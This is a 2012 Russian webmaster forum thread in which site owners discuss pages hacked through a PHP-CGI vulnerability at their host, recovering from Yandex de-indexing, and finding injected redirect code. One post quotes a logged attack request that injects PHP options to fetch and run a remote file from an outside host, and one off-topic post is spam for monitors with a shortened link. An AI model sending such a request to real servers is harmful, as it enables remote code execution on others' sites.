- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Маркетинг для шоколадной фабрики. На 34% выше средний чек
Через устранение узких мест
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
В общем, исследовав проблему более детально, нашел ее корни.
Проблема в уязвимости PHP установленного у хостера.
А именно, если по-русски, то вот этой: http://www.opennet.ru/opennews/art.shtml?num=33765
В моем случае, все выглядело вот так:
GET /?-d%20allow_url_include%3don+-d%20auto_prepend_file%3dhttp://www.convoy.ru/css/imgs.txt%20-n HTTP/1.0
Уязвимость примитивна, залатана она будет как обещается в мае, однако когда позаботятся обновиться хостеры не известно.
Если ничего не предпринимать, сайт могут ломать хоть каждую секунду в автоматическом режиме.
---------- Добавлено 08.05.2012 в 02:41 ----------
DpoHro, Хотел бы поинтересоваться по вопросу возврата страниц в индекс после взлома сайта. Насколько быстро проходит процесс по возврату страниц в индекс Яндекса вашего сайта и если писали в тех поддержку, то что ответили?
У меня вернулось на данный момент 10 страниц, и то это страницы с новыми материалами, которые добавляются в яндекс.новости. В техподдержке ответили через неделю, что позже сообщат причину обнуления показателей:
Вообщем ничего определенного.
Мне Платоны отписались что страницы вернуться в течение 2-3 недель.
Главное чтобы за этот период опять какаянибудь зараза не залезла на сайт.
Обидно что любой школьник такое мог сделать ((
Собственно всем - сразу грешите на Flash - в шапках, баннерах
Собственно всем - сразу грешите на Flash - в шапках, баннерах
Подробнее...?
Этот дисплей также хорошо! Но недавно я купил новые панели 3,5-дюймовый, TFT LCD монитор цвета Я больше нравится! Потому что это не только удобно, цены более разумными! Контроль качества, тем лучше! Это делать лучше, чем у других видов продукции! http://dok.do/HPDQml
Ваще жесть на таком форуме такие проблемы, печально...
DpoHro, Благодарю, за пост с разъяснением о появлении вредоносного кода. Дело в том, что проблема у меня не совсем исчезла. Периодически появлялся этот код, но я его удалял. За это время поменял антивирус перешел от бесплатного к платному (результат нашел на локальном компьютере трояна), поменял пароли... это не помогло, переустановил систему. перепроверил скрипты никаких дыр не обнаружил. Сегодня написал хостеру со ссылкой на ваше сообщение, тот сообщил, что проблема устранена. посмотрим, что будет дальше.
DpoHro, спасибо за пост.
Дыры закрыл. Уязвимость была на всех моих хостингах, мда...
Рад что помог.
Проблема глобальна, мой хостер (не буду показывать пальцем) имеет тьму зараженных сайтов и еще одну тьму уязвимых, а это один из ведущих хостеров в рунете.
Я не понимаю в чем проблема, не верю что они не знают, что сайты уже заражаются думаю в авторежиме. Написать скрипт который это делает дело одного дня.
В общем, ахтунг.
Рад что помог.
Проблема глобальна, мой хостер (не буду показывать пальцем) имеет тьму зараженных сайтов и еще одну тьму уязвимых, а это один из ведущих хостеров в рунете.
Я не понимаю в чем проблема, не верю что они не знают, что сайты уже заражаются думаю в авторежиме. Написать скрипт который это делает дело одного дня.
В общем, ахтунг.
Этот хостер не из трех букв, случайно?
Этот хостер не из трех букв, случайно?
Да из трех, он самый.
---------- Добавлено 11.05.2012 в 12:25 ----------
Пишите в ТП покажите ссылку из моего поста, они закроют.
Да из трех, он самый.
---------- Добавлено 11.05.2012 в 12:25 ----------
Пишите в ТП покажите ссылку из моего поста, они закроют.
Спасибо за ответ. Удачи вашему проекту и скорейшего возвращения в индекс!
Что касается этого хостера, то они задрали уже своей дырявостью. У меня сейчас точно такая же проблема как и у вас, почти весь трафик в статистике показывается с jindtesn_com. У меня, как назло, свежего бэкапа до заражения нет, только после.
Как вы избавились от этой дряни?
Спасибо, Вам тоже всего хорошего!
Проверить можно:
чистим кукисы в браузере, находим в поисковике ссылку на свой сайт и переходим, происходит редирект.
Там кука ставится так что повторно может не повториться редирект.
Потом смотрим, если страница перед редиректом успевает прогрузиться (может не отобразиться при этом) значит зараза сидит в js-скриптах. Если страница не успевает прогрузиться, смотрим Headers скорее всего там редирект есть, знасит ищем в php скриптах.
У меня первый раз через php редиректило второй раз через js. Вроде нашел все.